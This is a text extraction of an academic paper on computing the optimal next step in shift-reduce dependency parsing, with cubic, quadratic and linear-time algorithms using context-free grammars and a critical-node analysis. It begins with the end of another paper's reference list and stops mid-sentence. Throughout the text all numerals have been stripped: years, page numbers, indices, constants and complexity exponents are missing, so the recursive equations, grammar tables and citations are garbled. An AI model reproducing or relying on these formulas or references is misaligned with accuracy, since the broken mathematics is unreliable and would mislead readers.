of the second international workshop on paraphrasing, pages – , sapporo, japan, july. as- sociation for computational linguistics. richard socher, christopher d manning, and andrew y ng. . learning continuous phrase representa- tions and syntactic parsing with recursive neural net- works. in proceedings of the nips- deep learn- ing and unsupervised feature learning workshop, pages – . richard socher, eric h huang, jeffrey pennin, christo- pher d manning, and andrew y ng. . dynamic pooling and unfolding recursive autoencoders for para- phrase detection. in advances in neural information processing systems, pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa, october. association for computational linguistics. richard socher, andrej karpathy, quoc v. le, christo- pher d. manning, and andrew y. ng. . grounded compositional semantics for finding and de- scribing images with sentences. tacl, : – . james h steiger. . tests for comparing ele- ments of a correlation matrix. psychological bulletin, ( ): . xuchen yao, benjamin van durme, chris callison- burch, and peter clark. . semi-markov phrase- based monolingual alignment. in emnlp, pages – . mo yu and mark dredze. . improving lexical em- beddings with semantic knowledge. in proceedings of the nd annual meeting of the association for com- putational linguistics (volume : short papers), pages – , baltimore, maryland, june. association for computational linguistics. mo yu and mark dredze. . learning composi- tion models for phrase embeddings. transactions of the association for computational linguistics, : – . fabio massimo zanzotto, ioannis korkontzelos, francesca fallucchi, and suresh manandhar. . estimating linear models for compositional dis- tributional semantics. in proceedings of the rd international conference on computational linguis- tics, pages – . association for computational linguistics. calculating the optimal step in shift-reduce dependency parsing: from cubic to linear time mark-jan nederhof school of computer science university of st andrews, uk markjan.nederhof@googlemail.com abstract we present a new cubic-time algorithm to calculate the optimal next step in shift-reduce dependency parsing, relative to ground truth, commonly referred to as dynamic oracle. un- like existing algorithms, it is applicable if the training corpus contains non-projective struc- tures. we then show that for a projective training corpus, the time complexity can be improved from cubic to linear. introduction a deterministic parser may rely on a classifier that predicts the next step, given features extracted from the present configuration (yamada and matsumoto, ; nivre et al., ). it was found that accuracy improves if the classifier is trained not just on configurations that correspond to the ground-truth, or ‘‘gold’’, tree, but also on configurations that a parser would typically reach when a classifier strays from the optimal predictions. this is known as a dynamic oracle. the effective calculation of the optimal step for some kinds of parsing relies on ‘arc-decomposibility’, as in the case of goldberg and nivre ( , ). this generally requires a projective training cor- pus; an attempt to extend this to non-projective training corpora had to resort to an approxima- tion (aufrant et al., ). it is known how to calculate the optimal step for a number of non- a term we avoid here, as dynamic oracles are neither oracles nor dynamic, especially in our formulation, which allows gold trees to be non-projective. following, for example, kay ( ), an oracle informs a parser whether a step may lead to the correct parse. if the gold tree is non-projective and the parsing strategy only allows projective trees, then there are no steps that lead to the correct parse. at best, there is an optimal step, by some definition of optimality. an algorithm to compute the optimal step, for a given configuration, would typically not change over time, and therefore is not dynamic in any generally accepted sense of the word. projective parsing algorithms, however (gómez- rodrı́guez et al., ; gómez-rodrı́guez and fernández-gonzález, ; fernández-gonzález gómez-rodrı́guez, a); see also de lhoneux et al. ( ). ordinary shift-reduce dependency parsing is known at least since fraser ( ); see also nasr ( ). nivre ( ) calls it ‘‘arc-standard parsing.’’ for shift-reduce dependency parsing, calculation of the optimal step is regarded to be difficult. the best known algorithm is cubic and is only applicable if the training corpus is projective (goldberg et al., ). we present a new cubic-time algorithm that is also applicable to non-projective training corpora. moreover, its architecture is modular, expressible as a generic tabular algorithm for dependency parsing plus a context-free grammar that expresses the allow- able transitions of the parsing strategy. this dif- fers from approaches that require specialized tabular algorithms for different kinds of parsing (gómez-rodrı́guez et al., ; huang and sagae, ; kuhlmann et al., ). the generic tabular algorithm is interesting in its own right, and can be used to determine the opti- mal projectivization of a non-projective tree. this is not to be confused with pseudo-projectivization (kahane et al., ; nivre and nilsson, ), which generally has a different architecture and is used for a different purpose, namely, to allow a projective parser to produce non-projective structures, by encoding non-projectivity into pro- jective structures before training, and then recon- structing potential non-projectivity after parsing. a presentational difference with earlier work is that we do not define optimality in terms of ‘‘loss’’ or ‘‘cost’’ functions but directly in terms of attain- able accuracy. this perspective is shared by straka et al. ( ), who also relate accuracies of compet- ing steps, albeit by means of actual parser output and not in terms of best attainable accuracies. transactions of the association for computational linguistics, vol. , pp. – , . action editor: francois yvon. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april we further show that if the training corpus is projective, then the time complexity can be reduced to linear. to achieve this, we develop a new approach of excluding computations whose accuracies are guaranteed not to exceed the accu- racies of the remaining computations. the main theoretical conclusion is that arc-decomposibility is not a necessary requirement for efficient cal- culation of the optimal step. despite advances in unrestricted non-projective parsing, as, for example, fernández-gonzález and gómez-rodrı́guez ( b), many state-of- the-art dependency parsers are projective, as, for example, qi and manning ( ). one main practical contribution of the current paper is that it introduces new ways to train projective parsers using non-projective trees, thereby enlarging the portion of trees from a corpus that is available for training. this can be done either after applying optimal projectivization, or by computing optimal steps directly for non-projective trees. this can be expected to lead to more accurate parsers, especially if a training corpus is small and a large proportion of it is non-projective. preliminaries in this paper, a configuration (for sentence length n) is a -tuple (α,β,t) consisting of a stack α, which is a string of integers each between and n, a remaining input β, which is a suffix of the string · · · n, and a set t of pairs (a,a′) of integers, with ≤ a ≤ n and ≤ a′ ≤ n. further, αβ is a subsequence of · · · n, starting with . integer represents an artificial input position, not corresponding to any actual token of an input sentence. an integer a′ ( ≤ a′ ≤ n) occurs as second element of a pair (a,a′) ∈ t if and only if it does not occur in αβ. furthermore, for each a′ there is at most one a such that (a,a′) ∈ t . if (a,a′) ∈ t then a′ is generally called a dependent of a, but as we will frequently need concepts from graph theory in the remainder of this article, we will consistently call a′ a child of a and a the parent of a′; if a′ < a then a′ is a left child and if a < a′ then it is a right child. the terminology is extended in the usual way to include descendants and ancestors. pairs (a,a′) will henceforth be called edges. for sentence length n, the initial configuration is ( , · · · n,∅), and a final configuration is shift: (α, bβ, t) ` (αb, β, t) reduce left: (αa a , β, t) ` (αa , β, t ∪{(a ,a )}) reduce right: (αa a , β, t) ` (αa , β, t ∪{(a ,a )}), provided |α| > table : shift-reduce dependency parsing. of the form ( ,ε,t), where ε denotes the empty string. the three transitions of shift-reduce de- pendency parsing are given in table . by step we mean the application of a transition on a particular configuration. by computation we mean a series of steps, the formal notation of which uses `∗, the reflexive, transition closure of `. if ( , · · · n,∅) `∗ ( ,ε,t), then t represents a tree, with as root element, and t is projective, which means that for each node, the set of its descendants (including that node itself) is of the form {a,a + , . . . ,a′− ,a′}, for some a and a′. in general, a dependency tree is any tree of nodes labelled , , . . . , n, with being the root. the score of a tree t for a sentence is the number of edges that it has in common with a given gold tree tg for that sentence, or formally |t ∩tg|. the accuracy is the score divided by n. note that neither tree need be projective for the score to be defined, but in this paper the first tree, t , will normally be projective. where indicated, also tg is assumed to be projective. assume an arbitrary configuration (α,β,t) for sentence length n and assume a gold tree tg for a sentence of that same length, and as- sume three steps (α,β,t) ` (αi,βi,ti), with i = , , , obtainable by a shift, reduce left or reduce right, respectively. (if β = ε, or |α| ≤ , then naturally some of the three transitions need to be left out of consideration.) we now wish to calculate, for each of i = , , , the maximum value of |t ′i ∩tg|, for any t ′ i such that (αi,βi,ti) `∗ ( ,ε,t ′i ). for i = , , , let σi be this maximum value. the absolute scores σi are strictly speaking irrelevant; the relative values determine which is the optimal step, or which are the optimal steps, to reach a tree with the highest score. note that |{i | σi = maxj σj}| is either , , or . in the remainder of this article, we find it more convenient to calculate σi −|t ∩tg| for each i—or, in other words, gold edges that were previously found are left out of consideration. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april we can put restrictions on the set of allowable computations (α,β,t) `∗ ( ,ε,t ∪ t ′). the left-before-right strategy demands that all edges (a,a′) ∈ t ′ with a′ < a are found before any edges (a,a′) ∈ t ′ with a < a′, for each a that is rightmost in α or that occurs in β. the strict left- before-right strategy in addition disallows edges (a,a′) ∈ t ′ with a′ < a for each a in α other than the rightmost element. the intuition is that a non-strict strategy allows us to correct mistakes already made: if we have already pushed other elements on top of a stack element a, then a will necessarily obtain right children before it occurs on top of the stack again, when it can take (more) left children. by contrast, the strict strategy would not allow these left children. the definition of the right-before-left strategy is symmetric to that of the left-before-right strategy, but there is no independent strict right-before- left strategy. in this paper we consider all three strategies in order to emphasize the power of our framework. it is our understanding that goldberg et al. ( ) does not commit to any particular strategy. tabular dependency parsing we here consider context-free grammars (cfgs) of a special form, with nonterminals in n ∪(n`× nr), for appropriate finite sets n, n`, nr, which need not be disjoint. the finite set of terminals is denoted Σ. there is a single start symbol s ∈ n. rules are of one of the forms: • (b,c) → a, • a → (b,c), • (b′,c) → a (b,c), • (b,c′) → (b,c) a, where a ∈ n, b,b′ ∈ n`, c,c′ ∈ nr, a ∈ Σ. a first additional requirement is that if (b′,c) → a (b,c) is a rule, then (b′,c′) → a (b,c′), for any c′ ∈ nr, is also a rule, and if (b,c′) → (b,c) a is a rule, then (b′,c′) → (b′,c) a, for any b′ ∈ n`, is also a rule. this justifies our notation of such rules in the remainder of this paper as (b′, ) → a (b, ) and ( ,c′) → ( ,c) a, respectively. these two kinds of rules correspond to attachment of left and right children, respectively, in dependency parsing. secondly, we require that there is precisely one rule (b,c) → a for each a ∈ Σ. w`(b,i,i) = { , if (b,c) → ai , otherwise wr(c,i,i) = { , if (b,c) → ai , otherwise w`(b,c,i,j) = ⊕ k wr(b,i,k)⊗ w`(c,k + ,j) ⊗w(j,i) wr(b,c,i,j) = ⊕ k wr(b,i,k)⊗ w`(c,k + ,j) ⊗w(i,j) w`(c ′, i,j) = ⊕ a→(d,b), (c′, )→a (c, ), k w`(d,i,k) ⊗w`(b,c,k,j) wr(b ′, i,j) = ⊕ ( ,b′)→( ,b) a, a→(c,d), k wr(b,c,i,k) ⊗wr(d,k,j) w = ⊕ s→(b,c) w`(b, , ) ⊗wr(c, ,n) table : weighted parsing, for an arbitrary semi- ring, with ≤ i < j ≤ n. note that the additional requirements make the grammar explicitly ‘‘split’’ in the sense of eisner and satta ( ), eisner ( ), and johnson ( ). that is, the two processes of attaching left and right children, respectively, are independent, with rules (b,c) → a creating ‘‘initial states’’ b and c, respectively, for these two processes. rules of the form a → (b,c) then combine the end results of these two processes, possibly placing constraints on allowable combinations of b and c. to bring out the relation between our subclass of cfgs and bilexical grammars, one could ex- plicitly write (b,c)(a) → a, a(a) → (b,c)(a), (b′, )(b) → a(a) (b, )(b), and ( ,c′)(c) → ( ,c)(c) a(a). purely symbolic parsing is extended to weighted parsing much as usual, except that instead of attaching weights to rules, we attach a score w(i,j) to each pair (i,j), which is a potential edge. this can be done for any semiring. in the semiring we will first use, a value is either a non-negative integer or −∞. further, w ⊕w = max(w ,w ) and w ⊗w = w + w if w = −∞ and w = −∞ and w ⊗w = −∞ otherwise. naturally, the identity element of ⊕ is = −∞ and the identity element of ⊗ is = . tabular weighted parsing can be realized following eisner and satta ( ). we assume the input is a string a a · · ·an ∈ Σ∗, with a being the prospective root of a tree. table presents the cubic-time algorithm in the form of a system of recursive equations. with the semiring we chose above, w`(b,i,j) represents the highest score of any right-most derivation of the form (b, ) ⇒ a (b , ) ⇒ a a (b , ) ⇒∗ downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april (s,s) → a s → (s,s) ( ,s) → ( ,s) s (s, ) → s (s, ) table : grammar for projective dependency parsing, with Σ = {a} and n = n` = nr = {s}. figure : dependency structure and corresponding parse tree that encodes a computation of a shift-reduce parser. a · · ·am(bm, ) ⇒ a · · ·amaj ⇒∗ ai · · ·aj, for some m ≥ , and wr(c,i,j) has symmetric meaning. intuitively, w`(b,i,j) considers aj and its left dependents and wr(c,i,j) considers ai and its right dependents. a value w`(b,c,i,j), or wr(b,c,i,j), represents the highest score combining ai and its right dependents and aj and its left dependents, meeting in the middle at some k, including also an edge from ai to aj, or from aj to ai, respectively. one may interpret the grammar in table as encoding all possible computations of a shift- reduce parser, and thereby all projective trees. as there is only one way to instantiate the under- scores, we obtain rule (s,s) → (s,s) s, which corresponds to reduce left, and rule (s,s) → s (s,s), which corresponds to reduce right. figure presents a parse tree for the grammar and the corresponding dependency tree. note that if we are not given a particular strategy, such as left-before-right, then the parse tree underspec- ifies whether left children or right children are attached first. this is necessarily the case because the grammar is split. therefore, the computation in this example may consist of three shifts, fol- lowed by one reduce left, one reduce right, and one reduce left, or it may consist of two shifts, one reduce right, one shift, and two reduce lefts. (p,p) → p (s,s) → s p → (p,p) s → (p,s) s → (s,s) (s, ) → p (s, ) (s, ) → s (s, ) ( ,s) → ( ,p) s ( ,s) → ( ,s) s (s, ) → p (p, ) table : grammar for dependency parsing of pksm+ , representing a stack of length k + and remaining input of length m, with Σ = {p,s}, n = nr = n` = {p,s}. the last rule would be excluded for the strict left-to-right strategy, or alternatively one can set w(i,j) = −∞ for j < i < k. for a given gold tree tg, which may or may not be projective, we let w(i,j) = δg(i,j), where we define δg(i,j) = if (i,j) ∈ tg and δg(i,j) = otherwise. with the grammar from table , the value w found by weighted parsing is now the score of the most accurate projective tree. by backtracing from w as usual, we can construct the (or more correctly, a) tree with that highest accuracy. we have thereby found an effective way to projectivize a treebank in an optimal way. by a different semiring, we can count the number of trees with the highest accuracy, which reflects the degree of ‘‘choice’’ when projectivizing a treebank. o(n )o(n )o(n ) time algorithm in a computation starting from a configuration (a · · ·ak,b · · ·bm,t), not every projective parse of the string a · · ·akb · · ·bm is achievable. the structures that are achievable are captured by the grammar in table , with p for prefix and s for suffix (also for ‘‘start symbol’’). nonterminals p and (p,p) correspond to a node ai ( ≤ i < k) that does not have children. nonterminal s corresponds to a node that has either ak or some bj ( ≤ j ≤ m) among its descendants. this then means that the node will appear on top of the stack at some point in the computation. nonterminal (s,s) also corresponds to a node that has one of the rightmost m + nodes among its descendants, and, in addition, if it itself is not one of the rightmost m + nodes, then it must have a left child. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : dependency structure and corresponding parse tree, for stack of height and remaining input of length . nonterminal (p,s) corresponds to a node ai ( ≤ i < k) that has ak among its descendants but that does not have a left child. nonterminal (s,p) corresponds to a node ai ( ≤ i < k) that has a left child but no right children. for ai to be given a left child, it is required that it eventually appear on top of the stack. this requirement is encoded in the absence of a rule with right-hand side (s,p). in other words, (s,p) cannot be part of a successful derivation, unless the rule (s,s) → (s,p) s is subsequently used, which then corresponds to giving ai a right child that has ak among its descendants. figure shows an example. note that we can partition a parse tree into ‘‘columns’’, each con- sisting of a path starting with a label in n, then a series of labels in n` × nr and ending with a label in Σ. a dependency structure that is not achievable, and that appropriately does not correspond to a parse tree, for a stack of height and remaining input of length , is: • • • • | • suppose we have a configuration (a · · ·ak, b · · ·bm,t) for sentence length n, which implies k + m ≤ n. we need to decide whether a shift, reduce left, or reduce right should be done in order to achieve the highest accuracy, for given gold tree tg. for this, we calculate three values σ , σ and σ , and determine which is highest. the first value σ is obtained by investigat- ing the configuration (a · · ·akb ,b · · ·bm,∅) resulting after a shift. we run our generic tab- ular algorithm for the grammar in table , for input pk+ sm, to obtain σ = w . the scores are obtained by translating indices of a · · · akb · · ·bm = c · · ·ck+m to indices in the orig- inal input, that is, we let w(i,j) = δg(ci,cj). however, the shift, which pushes an element on top of ak, implies that ak will obtain right children before it can obtain left children. if we assume the left-before-right strategy, then we should avoid that ak obtains left children. we could do that by refining the grammar, but find it easier to set w(k,i) = −∞ for all i < k. for the second value σ , we investigate the con- figuration (a · · ·ak− ,b · · ·bm,∅) resulting after a reduce left. the same grammar and algorithm are used, now for input pk− sm+ . with a · · · ak− b · · ·bm = c · · ·ck+m− , we let w(i,j) = δg(ci,cj). we let σ = w ⊗ δg(ak− ,ak). in case of a strict left-before-right strategy, we set w(k − , i) = −∞ for i < k − , to avoid that ak− obtains left children after having obtained a right child ak. if k ≤ then the third value is σ = −∞, as no reduce right is applicable. otherwise we investigate (a · · ·ak− ak,b · · ·bm,∅). the same grammar and algorithm are used as before, and w(i,j) = δg(ci,cj) with a · · ·ak− akb · · ·bm = c · · ·ck+m− . now σ = w ⊗ δg(ak,ak− ). in case of a right-before-left strategy, we set w(k,i) = −∞ for k < i. we conclude that the time complexity of cal- culating the optimal step is three times the time complexity of the algorithm of table , hence cubic in n. for a proof of correctness, it is sufficient to show that each parse tree by the grammar in table corresponds to a computation with the same score, and conversely that each computation corresponds to an equivalent parse tree. our grammar has spurious ambiguity, just as the shift-reduce parser from table , and this can be resolved in the same way, depending on whether the intended strategy is (non-)strict left-before-right or right- before-left, and whether the configuration is the result of a shift, reduce left, or reduce right. concretely, we can restrict parse trees to attach children lower in the tree if they would be attached earlier in the computation, and thereby we obtain downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : a node ν with label in n` ×nr translates to configuration (d̄ · · · d̄k′, ē · · · ēm′,t), via its shortest path to the root. the overlined symbols denote the integers between and n corresponding to d · · · dk′e · · ·em′ ∈ p+s∗. a bijection between parse trees and computations. for example, in the middle column of the parse tree in figure , the (p,s) and its right child occur below the (s,s) and its left child, to indicate the reduce left precedes the reduce right. the proof in one direction assumes a parse tree, which is traversed to gather the steps of a computation. this traversal is post-order, from left to right, but skipping the nodes representing stack elements below the top of the stack, starting from the leftmost node labeled s. each node ν with a label in n` × nr corresponds to a step. if the child of ν is labeled s, then we have a shift, and if it has a right or left child with a label in n, then it corresponds to a reduce left or reduce right, respectively. the configuration resulting from that step can be constructed as sketched in figure . we follow the shortest path from ν to the root. all the leaves to the right of the path correspond to the remaining input. for the stack, we gather the leaves in the columns of the nodes on the path, as well as those of the left children of nodes on the path. compare this with the concept of right-sentential forms in the theory of context-free parsing. for a proof in the other direction, we can make use of existing parsing theory, which tells us how to translate a computation of the shift-reduce parser to a dependency structure, which in turn is easily translated to an undecorated parse tree. it then remains to show that the nodes in that tree can be decorated (in fact in a unique way), according to the rules from table . this is straightforward given the meanings of p and s described earlier in this section. most notably, the absence of a rule figure : components c , c , c partitioning nodes in β, and gold edges linking them to α. with right-hand side ( ,p) p does not prevent the decoration of a tree that was constructed out of a computation, because a reduction involving two nodes within the stack is only possible if the rightmost of these nodes eventually appears on top of the stack, which is only possible when the computation has previously made ak a descendant of that node, hence we would have s rather than p . o(n o(n o(n ) time algorithm assume a given configuration (α,β,t) as before, resulting from a shift or reduction. let α = a · · ·ak, a = {a , . . . ,ak}, and let b be the set of nodes in β. we again wish to calculate the maximum value of |t ′ ∩tg| for any t ′ such that (α,β,∅) `∗ ( ,ε,t ′), but now under the assumption that tg is projective. let us call this value σmax . we define w in terms of δg as in the previous section, setting w(i,j) = −∞ for an appropriate subset of pairs (i,j) to enforce a strategy that is (non-)strict left-before-right or right-before-left. the edges in tg ∩ (b × b) partition the re- maining input into maximal connected compo- nents. within these components, a node b ∈ b is called critical if it satisfies one or both of the following two conditions: • at least one descendant of b (according to tg) is not in b. • the parent of b (according to tg) is not in b. let bcrit ⊆ b be the set of critical nodes, listed in order as b , . . . ,bm, and let bncrit = b \bcrit . figure sketches three components as well as edges in tg ∩ (a×b) and tg ∩ (b ×a). com- ponent c , for example, contains the critical elements b , b , and b . the triangles under b , . . . , b represent subtrees consisting of edges leading to non-critical nodes. for each b ∈ bcrit , |tg ∩ ({b}× a)| is zero or more, or in words, downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april critical nodes have zero or more children in the stack. further, if (a,b) ∈ tg ∩ (a × bcrit ), then b is the rightmost critical node in a component; examples are b and b in the figure. let tmax be any tree such that (α,β,∅) `∗ ( ,ε,tmax ) and |tmax ∩tg| = σmax . then we can find another tree t ′max that has the same properties and in addition satisfies: . tg ∩ (b ×bncrit ) ⊆ t ′max , . t ′max ∩ (bncrit ×a) = ∅, . t ′max ∩ (b ×bcrit ) ⊆ tg, or in words, ( ) the subtrees rooted in the critical nodes are entirely included, ( ) no child of a non-critical node is in the stack, and ( ) within the remaining input, all edges to critical nodes are gold. very similar observations were made before by goldberg et al. ( ), and therefore we will not give full proofs here. the structure of the proof is in each case that all violations of a property can be systematically removed, by rearranging the computation, in a way that does not decrease the score. we need two more properties: . if (a,b) ∈ t ′max ∩ (a × bcrit ) \ tg then either: • b is the rightmost critical node in its component, or • there is (b,a′) ∈ t ′max ∩ tg, for some a′ ∈ a and there is at least one other critical node b′ to the right of b, but in the same component, such that (b′,a′′) ∈ t ′max ∩ tg or (a′′,b′) ∈ t ′max ∩ tg, for some a′′ ∈ a. . if (b,a) ∈ t ′max ∩(bcrit ×a) \ tg then there is (b,a′) ∈ t ′max , for some a′ ∈ a, such that a′ is a sibling of a immediately to its right. figure , to be discussed in more detail later, illustrates property ( ) for the non-gold edge from a ; this edge leads to b (which has outgoing gold edge to a ) rather than to b or b . it further respects property ( ) because of the gold edges connected to b and b , which occur to the right of b but in the same component. property ( ) is illustrated for the non-gold edge from b to a , which has sibling a immediately to the right. the proof that property ( ) may be assumed to hold, without loss of generality, again involves figure : counting additional gold edges in a×bcrit ∪ bcrit ×a. gold edges are thick, others are thin. gold edges that are not created appear dotted. making local changes to the computation, in particular replacing the b in an offending non- gold edge (a,b) ∈ a × bcrit by another critical node b′ further to the left or at the right end of the component. similarly, for property ( ), if we have an offending non-gold edge (b,a), then we can rearrange the computation, such that node a is reduced not into b but into one of the descendants of b in b that was given children in a. if none of the descendants of b in b was given children in a, then a can instead be reduced into its neighbor in the stack immediately to the left, without affecting the score. by properties ( )–( ), we can from here on ignore non-critical nodes, so that the remaining task is to calculate σmax −|bncrit|. in fact, we go further than that and calculate σmax − m, where m = |tg ∩ (b × b)|. in other words, we take for granted that the score can be at least as much as the number of gold edges within the remaining input, which leaves us with the task of counting the additional gold edges in the optimal computation. for any given component c we can consider the sequence of edges that the computation creates between a and c, in the order in which they are created: • for the first gold edge between c and a, we count + , • for each subsequent gold edge between c to a, we count + , • we ignore interspersed non-gold edges from c to a, • but following a non-gold edge from a to c, the immediately next gold edge between c and a is not counted, because that non- gold edge implies that another gold edge in bcrit ×bcrit cannot be created. this is illustrated by figure . for (b ,a ) we count + , it being the first gold edge connected downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april to the component. for the subsequent three gold edges, we count + for each, ignoring the non- gold edge (b ,a ). the non-gold edge (a ,b ) implies that the parent of b is already determined. one would then perhaps expect we count − for non-creation of (b ,b ), considering (b ,b ) was already counted as part of m. instead, we let this − cancel out against the following (b ,a ), by letting the latter contribute + rather than + . the subsequent edge (b ,a ) again contributes + , but the non-gold edge (a ,b ) means that the subsequent (a ,b ) contributes + . hence the net count in this component is . the main motivation for properties ( )–( ) is that they limit the input positions that can be relevant for a node that is on top of the stack, thereby eliminating one factor m from the time complexity. more specifically, the gold edges relate a stack element to a ‘‘current critical node’’ in a ‘‘current component’’. we need to distinguish however between three possible states: • n (none): none of the critical nodes from the current component were shifted on to the stack yet, • c (consumed): the current critical node was ‘consumed’ by it having been shifted and assigned a parent, • f (fresh): the current critical node was not consumed, but at least one of the preceding critical nodes in the same component was consumed. for ≤ i ≤ k, we define p(i) to be the index j such that (bj,ai) ∈ tg, and if there is no such j, then p(i) = ⊥, where ⊥ denotes ‘undefined’. for ≤ i < k, we let p≥(i) = p(i) if p(i) = ⊥, and p≥(i) = p≥(i + ) otherwise, and further p≥(k) = p(k). intuitively, we seek a critical node that is the parent of ai, or if there is none, of ai+ , . . . we define c(i) to be the smallest j such that (ai,bj) ∈ tg, or in words, the index of the leftmost child in the remaining input, and c(i) = ⊥ if there is none. as representative element of a component with critical element bj we take the critical element that is rightmost in that component, or formally, we define r(j) to be the largest j′ such that bj′ is an ancestor (by tg ∩ (bcrit × bcrit )) of bj. for completeness, we define r(⊥) = ⊥. we let p(i) = r(p(i)) and p≥(i) = r(p≥(i)). note that score(i,j,q) = if i < , otherwise: score(i,j,q) = [nchildren(i)−∆(c(i) = p≥(j) ∧q = n)]⊗ w(i,j) ⊗score(i− , i,τ(i,j,q)) ⊕ w(j,i) ⊗score(i− ,j,q) ⊕ [if p(j) = ⊥∨ q = c then −∞ else ∆(q = n) ⊗score′(i,p(j))] score′(i,j) = if i < , otherwise: score′(i,j) = [if p′(i,j) = ⊥ then score′(i− ,j) else ⊗score′(i− ,p′(i,j))] ⊕ nchildren(i) ⊗score(i− , i,τ ′(i,j)) nchildren(i) = |{j | w(i,j + k) = }| τ(i,j,q) = if q = n ∨p≥(i) = p≥(j) then n else if p≥(i) = p≥(j) then f else q τ ′(i,j) = if p≥(i) = r(j) then n else if p≥(i) = j then f else c table : quadratic-time algorithm. r(c(i)) = c(i) for each i. for ≤ i ≤ k and ≤ j ≤ m, we let p′(i,j) = p(i) if p(i) = r(j) and p′(i,j) = ⊥ otherwise; or in words, p′(i,j) is the index of the parent of ai in the remaining input, provided it is in the same component as bj. table presents the algorithm, expressed as system of recursive equations. here score(i,j,q) represents the maximum number of gold edges (in addition to m) in a computation from (a · · ·aiaj,b` · · ·bk,∅), where ` depends on the state q ∈ {n ,c,f}. if q = n , then ` is the smallest number such that r(`) = p≥(j); critical nodes from the current component were not yet shifted. if q = c, then ` = p≥(j) + or ` = p≥(j) + ; this can be related to the two cases distinguished by property ( ). if q = f, then ` is greater than the smallest number such that r(`) = p≥(j), but smaller than or equal to p≥(j) or equal to ` = p≥(j) + . similarly, score′(i,j) represents the maximum number of gold edges in a computation from (a · · ·aibj,bj+ · · ·bk,∅). for i ≥ , the value of score(i,j,q) is the maximum (by ⊕) of three values. the first corresponds to a reduction of aj into ai, which turns the stack into a · · ·ai− ai; this would also include shifts of any remaining right children of ai, if there are any, and their reduction into ai. because there is a new top-of-stack, the state is updated using τ. the function nchildren counts the critical nodes that are children of ai. we define nchildren in terms of w rather than tg, as in the case of the right-before-left strategy downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : graphical representation of the first value in the definition of score, for the case q = f, assuming c(i) = p≥(j) = ` and ai further has children b`+ and b`+ . because q = f, there was some other node b`′ in the same component that was shifted on to the stack earlier and given a (non-gold) parent; let us assume `′ = ` − . we can add children to the score, but should subtract ∆(c(i) = p≥(j) ∧ q = n) = , to compensate for the fact that edge (b`,b`− ) cannot be constructed, as b`− can only have one parent. if we further assume ai has a parent among the critical nodes, then that parent must be in a different component, and therefore τ(i,j,q) = n . after a reduce right we would preclude right children of ak by setting w(k,i) = −∞ for k < i. the leftmost of the children, at index c(i), is not counted (or in other words, is subtracted from the number of children) if it is in the current component p≥(j) and that component is anything other than ‘none’; here ∆ is the indicator function, which returns if its boolean argument evaluates to true, and otherwise. figure illustrates one possible case. the second value corresponds to a reduction of ai into aj, which turns the stack into a · · ·ai− aj, leaving the state unchanged as the top of the stack is unchanged. the third value is applicable if aj has parent b` that has not yet been consumed, and it corresponds to a shift of b` and a reduction of ai into b` (and possibly further shifts and reductions that are implicit), resulting in stack a · · ·aib`. if this creates the first gold edge connected to the current component, then we add + . for i ≥ , the value of score′(i,j) is the max- imum of two values. the first value distinguishes two cases. in the first case, ai does not have a parent in the same component as bj, and ai is reduced into bj without counting the (non-gold) edge. in the second case, ai is reduced into its par- ent, which is bj or another critical node that is an ancestor of bj; in this case we count the gold edge. the second value in the definition of score′(i,j) corresponds to a reduction of bj into ai (as well as shifts of any critical nodes that are children of ai, and their reduction into ai), resulting in stack figure : assuming the thick edges are gold, then the thin edge cannot be gold as well, as the gold tree is projective. a score obtained from a stack a · · ·ai− ai is therefore at least as high as a score obtained from a stack a · · ·ai− aj , unless all of a`′+ , . . . , ai first become children of aj via a series of reduce right steps, all producing non-gold edges, and therefore adding nothing to the score. the κ function implements such a series of reduce right steps. a · · ·ai− ai. the state is updated using τ ′, in the light of the new top-of-stack. the top-level call is score(k − ,k,n). as this does not account for right children of the top of stack ak, we need to add nchildren(k). putting everything together, we have σmax = m ⊗ score(k − ,k,n) ⊗ nchildren(k). the time complexity is quadratic in k + m ≤ n, given the quadratically many combinations of i and j in score(i,j,q) and score′(i,j). o(n)o(n)o(n) time algorithm under the same assumption as in the previous sec- tion, namely, that tg is projective, we can further reduce the time complexity of computing σmax , by two observations. first, let us define λ(i,j) to be true if and only if there is an ` < i such that (a`,aj) ∈ tg or (aj,a`) ∈ tg. if (aj,ai) /∈ tg and λ(i,j) is false, then the highest score attain- able from a configuration (a · · ·ai− aj,β,∅) is no higher than the highest score attainable from (a · · ·ai− ai,β,∅), or, if aj has a parent bj′, from (a · · ·aibj′,β′,∅), for appropriate suffix β′ of β. this means that in order to calculate score(i,j,q) we do not need to calculate score(i− ,j,q) in this case. secondly, if (aj,ai) /∈ tg and λ(i,j) is true, and if there is `′ < i such that (a`′,ai) ∈ tg or (ai,a`′) ∈ tg, then there are no edges between aj and ai′ for any i′ with `′ < i′ < i, because of projectivity of tg. we therefore do not need to calculate score(i′,j,q) for such values of i′ in order to find the computation with the highest score. this is illustrated in figure . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april let us define κ(i) to be the smallest `′ such that (a`′,ai) ∈ tg or (ai,a`′) ∈ tg, or i − if there is no such `′. in the definition of score, we may now replace w(j,i) ⊗score(i− ,j,q) by: [if w(j,i) = then ⊗score(i− ,j,q) else if w(j,i) = ∧λ(i,j) then score(κ(i),j,q) else −∞] similarly, we define λ′(i,j) to be true if and only if there is an ` < i such that (a`,bj′) ∈ tg or (bj′,a`) ∈ tg for some j′ with r(j′) = r(j). in the definition of score′, we may now replace score′(i− ,j) by: [if λ′(i,j) then score′(κ(i),j) else −∞] thereby the algorithm becomes linear-time, because the number of values score(i,j,q) and score′(i,j) that are calculated for any i is now linear. to see this, consider that for any i, score(i,j,q) would be calculated only if j = i + , if (ai,aj) ∈ tg or 